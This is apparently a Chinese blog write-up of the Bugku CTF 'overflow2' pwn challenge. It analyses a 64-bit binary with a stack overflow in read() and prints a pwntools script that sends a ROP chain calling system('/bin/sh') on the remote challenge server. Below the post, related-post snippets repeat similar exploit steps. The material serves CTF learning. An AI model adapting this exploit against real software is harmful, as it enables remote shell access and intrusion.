【bugku】overflow2

原创 于 2024-11-27 08:00:00 发布 · 1.5k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf

1、题目描述:给了nc的地址和端口,和一个附件

2、在kali中使用file命令分析该文件,checksec查看是否有保护机制

该文件是ELF格式的可执行文件,适用于64位的系统

没有启动栈保护

3、结合题目描述overflow,推测是栈溢出

4、用ida64分析文件,先查看主函数,这段主函数的关键就是,它定义了一个数组大小是4,而read函数在读取的时候,是读取它的0x100ull这超出了数组的范围,会导致栈溢出

5、双击buf查看buf数组的栈结构,根据这两个关键的数据我们可以知道

  • Frame size: 20:这表示栈帧的总大小为 32 字节(20 是 32 的十六进制表示)。栈帧是每个函数调用在栈上分配的内存区域,用于存储局部变量、返回地址、保存的寄存器等。
  • Saved regs: 8:这表示保存了 8 字节的寄存器信息。通常这 8 字节用于保存调用函数的返回地址。

6、通过shift+f12来查看调用了哪些函数,这里看到了一个脚本函数,双击/bin/in查看程序地址,查看system函数调用的地址

7、寄存器rdi的地址:

8、构造exp:

from pwn import *
# sh = process('./pwn')
sh = remote('114.67.175.224', 11584)

sh.recvuntil(b'Please Input your name')

pop_rdi_ret = 0x40126b
system_addr = 0x401050
binsh_addr = 0x402004

payload = b'a'*32 + p64(1) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.send(payload)
sh.interactive()

我们通过构造rop链来执行system("/bin/sh")这个命令,在使用system函数时,它的第一个参数,需要放在rdi寄存器中,而这个参数就是/bin/sh。因此,我们需要rdi,后门函数/bin/sh,system函数这三个地址来构造一个rop链。

9、

通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
dvlinker的技术专栏
08-04 2万+
通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 4262
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
bugkuoverflow
2201_75556700的博客
11-25 683
4、用64位的IDA分析文件,按F5进入主函数,这段程序定义了一个48字节的数组s。memset()函数将数组s的前0x30字节初始化为0,read()函数以s作为缓存区读取了0x100个字节的数据。数组s的长度小于要读取的长度,这会导致缓冲区溢出。5、在函数那一栏,看到名为get_shell的函数,可能是一个后门函数,它的地址为0x400751。我们需要覆盖返回地址,因此需要填充 48 字节的缓冲区,再加上 8 字节的栈帧指针(EBP)。需要找到能调用该函数的入口,需要将数组s的部分进行覆盖。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2695
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
BugkuCTFoverflow2[WriteUP]
如有错误感谢斧正
04-14 978
我们需要构造payload使buf数组溢出,然后接上这里的total总的合成地址即可实现shell交互。总共需要填充28个字节,后面溢出可以填充为成0x20+0x8,或者直接写成0x28。总链:total = 0x40126b + 0x402004 + 0x401050。存在/bin/sh意味着我们可以利用这个字符串启动shell,双击查看地址。先看到_system函数,此函数可以直接返回一个由实参当作命令的消息。再查看下方的地址信息,获取到该函数十六进制地址为:0x401050。查看一下flag文件。
BugkuCTF pwn overflow2
ChaoYue_miku的博客
07-04 1602
** 0、尝试打开文件,使用checksec检查保护情况 ** ** 1、使用IDA 64 Pro打开文件 ** read()函数存在栈溢出,查看栈结构 ** 2、构造rop链 ** Shitf+F12查找字符串 发现/bin/sh的地址是0x402004 system函数的地址是0x401050 64位程序的第一个参数在 rdi 寄存器里 使用ROPgadget工具寻找汇编指令 rdi寄存器地址:0x40126b ** 3、构造exp ** from pwn import * r = remo
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1996
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
BugkuCTF-PWNpwn5-overflow2超详细讲解
am_03的博客
08-31 2010
知识点 setvbuf: setvbuf函数的功能: 如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用 fopen/fread/fwrite/fscanf/fprintf语句的时候,都会在内存里操作,减少内存到磁盘IO读写的操作次数,提高系统效率。 如果你的程序的功能涉及到类似数据库、视频、音频、图像处理等大量需要爆发式磁盘到内存的IO情况下,可以考虑setvbuf进行优化内存IO。 功 能: 把缓区与流相关 解题流程 查看保护机制 发现开启了RELRO,NX 只能通过ROP绕过 IDA
overflow:auto的用法详解
01-18
在开始正文前,我介绍一下overflow和flex布局的某些用法。 overflow:auto;如果内容被修剪,则浏览器会显示滚动条,以便查看其余内容。 flex中的属性 display: flex; flex-direction: column; 主轴为垂直方向,...
l2tpd_overflow2.nasl
11-08
l2tpd_overflow2
css中overflow:hidden失效问题的解决方法
11-21
今天在写轮播图的时候发现,overflow;hidden;竟然能失效,发现原因如下:父元素想要隐藏溢出的绝对定位的子元素,需要给父元素加一个定位;因为绝对定位的子元素会从内向外寻找有定位的父元素,找不到的话overflow:...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 2782
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在栈溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
pwn5 - bugku
SkYe's Blog
11-02 898
pwn5 - bugku 本文并未真正意义上的writeup,因为我无法成功复现???只是单纯记录一下,做题笔记 首先看一下保护,只开了NX。 没有危险函数,如system、getshell等 main函数中的变量s,在read函数时可以造成溢出。当中的if条件是限制程序的第二次输入必须包含真香、鸽子两个字符串。 当中的重点是printf存在格式化字符串漏洞,我们可以从这里读取到main函...
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2798
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTFPWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
Bugku CTF web21(Web)
ChaoYue_miku的博客
03-04 675
0、打开网页,查看源代码 注释中的1p.html有些可疑 1、访问http://114.67.246.176:16508/1p.html,并查看源代码 view-source:http://114.67.246.176:16508/1p.html %3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQ
BugkuCTF pwn pwn1
H4ppyD0g的博客
08-17 1343
1 pwn1 ubuntu下输入 nc 114.116.54.89 10001 然后ls查看该目录下文件,发现有flag文件, cat flag 获取flag。 nc 主机的ip或域名端口号 作用是建立于对应ip或端口的链接,相当于一个后门web shell,可以进行访问等操作。 nc的作用还有很多,这里只是最简单的应用。 ...
基于PSCAD的500kV双极直流输电系统仿真模型构建与优化 换流器
最新发布
08-26
利用PSCAD软件搭建500kV双极直流输电系统的仿真模型。首先,文中阐述了系统的核心配置,包括采用12脉动换流器、分布式参数模型的接地极线路以及双闭环控制系统。接着,重点讲解了换流器触发脉冲生成的关键代码,特别是锁相环同步信号处理和PI控制器参数调整的方法。此外,还讨论了直流线路建模中分布参数模型的应用及其优势,并指出了一些常见的建模错误和解决方案。对于接地极部分,强调了双极不平衡保护机制的重要性。最后,分享了仿真过程中遇到的问题及解决方法,如启动阶段的电压爬升曲线异常、换相失败等问题。 适合人群:电力系统工程师、科研人员、高校师生等对高压直流输电技术感兴趣的读者。 使用场景及目标:适用于希望深入了解500kV双极直流输电系统的工作原理和技术细节的研究人员;希望通过实际案例掌握PSCAD仿真的技术人员。 其他说明:文章不仅提供了理论知识,还结合具体实例进行了深入浅出的解释,有助于读者更好地理解和应用相关技术。
#define OVERFLOW -2
06-17
在这个例子中,`#define OVERFLOW -2。当在代码中使用 `OVERFLOW` 时,编译器会将其替换为 `-2`。 然而,在第二个示例[^2]中,宏定义的写法存在问题。分号(`;`)不应该放在#define语句的末尾,因为它们表示新的一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值